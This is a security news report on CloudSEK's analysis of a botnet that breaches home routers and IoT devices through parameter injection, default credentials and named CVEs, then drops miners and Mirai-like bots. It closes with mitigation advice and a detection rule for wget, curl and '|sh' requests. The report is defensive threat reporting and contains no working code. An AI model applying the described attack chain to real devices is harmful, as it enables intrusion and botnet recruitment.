CloudSEK researchers have reported a large-scale campaign leveraging a Loader-as-a-Service botnet, which over the past six months has transformed home routers and IoT devices into engines for cryptocurrency mining and Mirai-style attacks. An analysis of leaked command-and-control server logs revealed the full attack chain — from breaching admin panels to deploying multi-architecture binaries and exploiting compromised devices.
The attackers employ a combination of techniques: injecting unvalidated POST parameters (in fields such as ntp, syslog, hostname), brute-forcing default credentials, and exploiting vulnerabilities in enterprise and CMS platforms. Targets included Oracle WebLogic, WordPress, and vBulletin, with attackers leveraging known flaws such as CVE-2019-17574, CVE-2019-16759, and CVE-2012-1823. In the enterprise segment, exploitation attempts focused on WebLogic deserialization, Struts2 OGNL injections, and JNDI exploits.
According to CloudSEK, attack intensity surged by 230% in July and August 2025. Infected devices were seeded with multi-architecture executables from the Morte family, JSON-RPC miners, and Mirai-like bots. These assets were later weaponized for DDoS campaigns, covert mining, and resale of access credentials.
The leaked panel logs revealed the attackers’ structured methodology. Blocks such as [ReplyPageLogin] tracked brute-force credential attempts; [ConfigSystemCommand] and [SystemCommand] issued commands to download droppers via wget, busybox, and TFTP/FTP chains; [ReplyErrorPage] and [ReplySuccessPage] monitored failures or successful execution; while [ReplyDeviceInfo] collected details on firmware, MAC addresses, and available services. This intelligence enabled attackers to tailor payloads precisely for each target device.
The investigation confirmed that the primary focus was on SOHO routers with vulnerable interfaces such as wlwps.htm and wan_dyna.html, as well as embedded Linux systems where binaries like morte.x86 and morte.x86_64 were deployed. The reliance on HTTP, FTP, and TFTP protocols for payload delivery further enhances the botnet’s resilience and adaptability.
The campaign’s impact is multi-layered. For enterprises, it introduces risks of data exfiltration, lateral movement, and secondary threats including ransomware. Corporate routers face threats of network saturation, NTP tampering, and DNS manipulation. Small businesses and ISPs, meanwhile, often find their infrastructure repurposed as a launchpad for larger-scale attacks, resulting in network degradation, increased incident response workloads, and a constant need to track new attack vectors.
CloudSEK recommends a multi-layered defense strategy: blocking outbound HTTP, HTTPS, FTP, and TFTP traffic from IoT segments; isolating devices exhibiting suspicious POST-parameter manipulation; updating firmware and credentials; and disabling remote administration.
For SOC and SIEM teams, detection rules should flag suspicious requests involving wget, curl, or |sh executions, as well as anomalous JSON-RPC connections. In response workflows, infected devices must be isolated, forensic artifacts such as logs and /tmp contents collected, and where updates are impossible, devices should be fully reflashed or replaced.
CloudSEK forecasts the continued evolution of this infrastructure, with a growing set of targeted devices and increasingly sophisticated malicious modules. In their assessment, only systematic oversight and rapid response can mitigate the risks posed by this new service-based botnet model.